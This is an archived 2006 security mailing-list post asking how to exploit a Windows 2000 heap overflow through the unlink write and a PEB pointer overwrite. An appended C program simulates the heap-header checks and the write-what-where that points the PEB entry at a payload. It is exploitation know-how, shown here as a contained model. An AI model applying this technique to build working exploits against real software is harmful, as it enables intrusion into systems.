Date: Tue, 1 Aug 2006 07:46:23 +1200 (NZST)
From: Ivan Stroks <ivanstroks@...oo.co.nz>
To: full-disclosure@...ts.grok.org.uk
Subject: Exploiting heap overflows in W2K

Hi list,
 
  I am trying to exploit a heap buffer overflow vulnerability and am facing some problems; I hope you can help.
  I run the vulnerable program in VMware, attached with Olly.
 
  These are my problems:
 
  1. I control both EAX and ESI when the program reaches
 
     mov [esi], eax
     mov [eax + 4], esi
 
     First of all, I tried gaining control of execution through the PEB but, according to Halvar's presentation, there are some restrictions on what you can write in the header of the overflowed buffer.
     Quoting: 
     
     " Properties our block must have:
 
         Bit 0 of Flags must be set
         Bit 3 of Flags must be set
         Field_4 must be smaller than 0x40
         The first field (own size) must be larger than 0x80
 
         The block 'XXXX99XX' meets all requirements"
 
     So, supposing the PEB pointer to overwrite is 0x7FFDF020, I would need to specify, for example, XXXX20f0fd7f, but this does not match the required properties and so RtlFreeHeap exits.
     I am sure I must be missing something here, but can't find it.
 
  2. An additional problem I am facing, since this is my first heap overflow session, is that when I trigger the vulnerability as soon as the program comes back from "revert snapshot", I get to RtlFreeHeap fine, but if some other requests are made to the program first, I cannot reproduce that behaviour again and different behaviours and situations arise.
    It is obvious that my exploit won't be the first request the program receives, so how can I manage this?
 
 
    Hope you can help!
    Regards,
 
 IvaN!
 
 
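As an added example (not part of Ivan's message, of Halvar Flake's slides, or of any ntdll code), the C program below models the two things the post is juggling. First, the four header properties quoted above, checked against both the 'XXXX99XX' header from the slides and the 'XXXX20f0fd7f' layout the post tried; second, the two-instruction unlink write from the post, with ESI taken as the Blink and EAX as the Flink of the block being unlinked, run inside a simulated 32-bit address space so that a store to 0x7FFDF020 is harmless on the machine running it. The byte layout of the header (own size, previous size, Field_4, flags, two unchecked bytes), the heap address 0x00410000, and the block and payload offsets are assumptions of this model.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Two simulated 4 KiB pages: the page holding the PEB pointer named in the
 * post (0x7FFDF020) and one standing in for the heap the overflowed block
 * lives in.  HEAP_BASE is an address assumed for this example. */
#define PEB_PAGE   0x7FFDF000u
#define HEAP_BASE  0x00410000u
#define PAGE_SIZE  0x1000u

static uint8_t peb_mem[PAGE_SIZE];
static uint8_t heap_mem[PAGE_SIZE];

/* Translate a simulated 32-bit address to host memory.  Anything outside the
 * two pages aborts, the way an unmapped write in the real target would fault. */
static uint8_t *host(uint32_t va) {
    if (va >= PEB_PAGE  && va < PEB_PAGE  + PAGE_SIZE) return peb_mem  + (va - PEB_PAGE);
    if (va >= HEAP_BASE && va < HEAP_BASE + PAGE_SIZE) return heap_mem + (va - HEAP_BASE);
    fprintf(stderr, "unmapped address %08x\n", (unsigned)va);
    abort();
}

/* Little-endian 32-bit load/store, one byte at a time through host(). */
static uint32_t rd32(uint32_t va) {
    uint32_t v = 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)*host(va + i) << (8 * i);
    return v;
}
static void wr32(uint32_t va, uint32_t v) {
    for (int i = 0; i < 4; i++) *host(va + i) = (uint8_t)(v >> (8 * i));
}

/* The four properties quoted from the slides, tested on the 8 raw header
 * bytes assumed to be laid out as: bytes 0-1 own size, 2-3 previous size,
 * 4 "Field_4", 5 flags, 6-7 not checked.  A model of the quoted rules only. */
static int header_ok(const uint8_t h[8]) {
    uint16_t size = (uint16_t)(h[0] | h[1] << 8);
    uint8_t field_4 = h[4], flags = h[5];
    return (flags & 0x01) && (flags & 0x08) && field_4 < 0x40 && size > 0x80;
}

/* The two headers discussed in the post: the slides' example and the
 * little-endian PEB pointer the post tried to place in the header bytes. */
static const uint8_t slides_header[8] = {'X','X','X','X','9','9','X','X'};
static const uint8_t tried_header[8]  = {'X','X','X','X',0x20,0xf0,0xfd,0x7f};

/* The sequence from the post, with ESI = Blink and EAX = Flink:
 *     mov [esi], eax
 *     mov [eax + 4], esi                                                  */
static void unlink_write(uint32_t esi, uint32_t eax) {
    wr32(esi, eax);       /* *Blink = Flink     : the 4-byte write we want   */
    wr32(eax + 4, esi);   /* *(Flink+4) = Blink : side effect on our payload */
}

/* Lay out what the overflow must place over the neighbouring free block
 * (8-byte header, then Flink, then Blink), run the unlink, and report
 * whether the PEB pointer now holds the payload address.  Returns 1 on
 * success, 0 otherwise. */
static int unlink_demo(void) {
    const uint32_t target  = 0x7FFDF020u;        /* PEB pointer named in the post        */
    const uint32_t block   = HEAP_BASE + 0x200;  /* assumed: the free block we overflow  */
    const uint32_t payload = HEAP_BASE + 0x100;  /* assumed: where our code would sit    */

    if (!header_ok(slides_header)) return 0;     /* header must survive the free path   */
    for (int i = 0; i < 8; i++) *host(block + i) = slides_header[i];
    wr32(block + 8,  payload);                   /* Flink, becomes EAX */
    wr32(block + 12, target);                    /* Blink, becomes ESI */

    unlink_write(rd32(block + 12), rd32(block + 8));

    /* The pointer now holds the payload address, and payload+4 was clobbered
     * with the Blink value, so the payload's first bytes must jump over it. */
    return rd32(target) == payload && rd32(payload + 4) == target;
}

int main(void) {
    printf("header XXXX99XX passes the quoted rules:     %d\n", header_ok(slides_header));
    printf("header XXXX20f0fd7f passes the quoted rules: %d\n", header_ok(tried_header));
    printf("unlink stores payload address at 0x7FFDF020: %d\n", unlink_demo());
    return 0;
}
```

Two things the model makes visible: the pointer pair that feeds the unlink sits after the 8-byte header, so the header bytes and the Flink/Blink values are chosen independently, and the second store lands at Flink+4, so whatever is at payload+4 is overwritten with the Blink value before control ever reaches it.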

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
